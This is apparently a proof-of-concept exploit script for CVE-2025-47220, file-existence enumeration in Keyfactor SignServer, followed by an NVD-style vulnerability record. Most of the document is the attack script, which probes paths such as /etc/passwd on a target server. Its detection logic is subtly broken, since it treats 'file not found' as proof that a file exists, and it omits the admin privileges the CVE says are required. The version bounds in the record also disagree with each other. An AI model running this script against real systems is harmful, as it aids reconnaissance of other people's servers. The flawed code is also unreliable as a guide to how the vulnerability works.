CVE-2025-47220

import requests import sys # CVE-2025-47220 PoC - Local File Enumeration in Keyfactor SignServer # Target: Keyfactor SignServer < 7.3.2 # Vulnerability: VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH allows arbitrary path specification def check_file_existence(target_url, file_path): """ Attempts to enumerate file existence by exploiting the VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH property vulnerability. Args: target_url: Base URL of the SignServer instance file_path: Path to check for existence Returns: bool: True if file exists, False otherwise """ # Endpoint for PDF signer configuration endpoint = f"{target_url}/signserver/pdfsigner" # Malicious parameter that triggers file enumeration payload = { 'VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH': file_path, 'workerName': 'PDFSigner' } try: response = requests.post(endpoint, data=payload, timeout=10) # Check for error messages indicating file existence # If file exists but is not a valid image format, error is returned error_indicators = [ 'not a valid image', 'cannot read', 'file not found', 'does not exist', 'invalid format' ] response_text = response.text.lower() # If we get an error about image format, file exists for indicator in error_indicators: if indicator in response_text: return True return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-47220.py <target_url> <file_path>") print("Example: python cve-2025-47220.py http://localhost:8080 /etc/passwd") sys.exit(1) target_url = sys.argv[1] file_path = sys.argv[2] print(f"[*] Checking file existence: {file_path}") result = check_file_existence(target_url, file_path) if result is True: print(f"[+] File EXISTS: {file_path}") elif result is False: print(f"[-] File does NOT exist or is not accessible") else: print(f"[!] Could not determine file status") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-47220", "sourceIdentifier": "[email protected]", "published": "2025-11-13T21:15:49.443", "lastModified": "2025-12-17T20:15:54.960", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local file enumeration was found in Keyfactor SignServer versions prior to 7.3.2 .The property VISIBLE_SIGNATURE_CUSTOM_IMAGE_PATH, which exists in the PDFSigner and the PAdESSigner, can be set to any path without any restrictions by an admin user. In the case that the provided path points to an existing file, readable by the user running the application server, but is not a recognized image format, it will return this as an error to the clientside, confirming the existences of the file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.3.1", "matchCriteriaId": "D27BE713-6FAA-452D-BDD4-784A8FEF0801"}]}]}], "references": [{"url": "https://docs.keyfactor.com/signserver/latest/signserver-7-3-release-notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://support.keyfactor.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://support.keyfactor.com/hc/en-us/articles/37638761131035-SignServer-CVE-2025-47220-Local-file-enumeration", "source": "[email protected]"}]}}